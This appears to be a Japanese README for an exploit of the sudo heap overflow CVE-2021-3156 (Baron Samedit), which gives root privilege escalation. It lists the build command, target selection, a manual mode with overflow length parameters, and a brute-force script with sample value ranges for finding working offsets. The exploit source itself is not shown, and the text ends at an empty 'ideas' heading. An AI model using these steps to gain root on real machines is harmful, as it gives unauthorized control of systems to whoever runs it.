
sudo における CVE-2021-3156 (Baron Samedit) のヒープベースのバッファオーバーフローエクスプロイト。複数のターゲット構成と実験的なブルートフォースターゲット発見により、root への権限昇格を提供します。
これは、QualysによってBaron Sameditと呼ばれるCVE-2021-3156 sudo脆弱性のエクスプロイトです。
ビルド:
$ make
ターゲット一覧:
$ ./sudo-hax-me-a-sandwich
実行:
$ ./sudo-hax-me-a-sandwich <target_number>
手動モード:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
GNU parallel がインストールされていることを確認してください。
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
試すデフォルト値の例:
$ ./brute.sh 90 120 50 70 150 300
利用可能なすべてのコアを消費します。netflix & brute はやめてください。
(適切な)PRを送ってください。マージするかもしれません。
いくつかのアイデア: